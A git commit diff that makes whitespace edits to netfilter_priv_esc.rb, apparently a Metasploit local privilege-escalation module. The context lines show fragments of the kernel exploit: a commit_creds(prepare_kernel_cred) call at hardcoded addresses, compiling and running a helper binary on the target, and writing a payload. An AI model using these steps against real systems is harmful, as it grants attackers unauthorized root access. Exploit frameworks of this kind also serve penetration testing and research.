reexploit and other docs and edits added

h00die · h00die · commit edd17040800c · 2016-09-18T09:01:41.000-04:00
diff --git a/modules/exploits/linux/local/netfilter_priv_esc.rb b/modules/exploits/linux/local/netfilter_priv_esc.rb
@@ -279,7 +279,7 @@ def exploit
       void __attribute__((regparm(3))) privesc() {
           commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
           prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
-              commit_creds(prepare_kernel_cred((uint64_t)NULL));
+          commit_creds(prepare_kernel_cred((uint64_t)NULL));
       }
 
       int main() {
@@ -318,7 +318,7 @@ def exploit
     if check != CheckCode::Appears
       fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
     end
-    
+
     def pwn(payload_path, pwn_file, pwn)
       # lets write our payload since everythings set for priv esc
       vprint_status("Writing payload to #{payload_path}")
@@ -347,7 +347,7 @@ def pwn(payload_path, pwn_file, pwn)
       rm_f desc_file
       write_file("#{desc_file}.c", decr)
       output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
-  
+
       register_file_for_cleanup(env_ready_file)
       register_file_for_cleanup("#{desc_file}.c")
       register_file_for_cleanup(desc_file)
@@ -362,13 +362,13 @@ def pwn(payload_path, pwn_file, pwn)
       end
       cmd_exec("chmod +x #{desc_file}; #{desc_file}")
       sec_waited = 0
-  
+
       until sec_waited > datastore['MAXWAIT'] do
         Rex.sleep(1)
         if sec_waited % 10 == 0
           vprint_status("Waited #{sec_waited}s so far")
         end
-  
+
         if file_exist?(env_ready_file)
           print_good("desc finished, env ready.")
           pwn(payload_path, pwn_file, pwn)
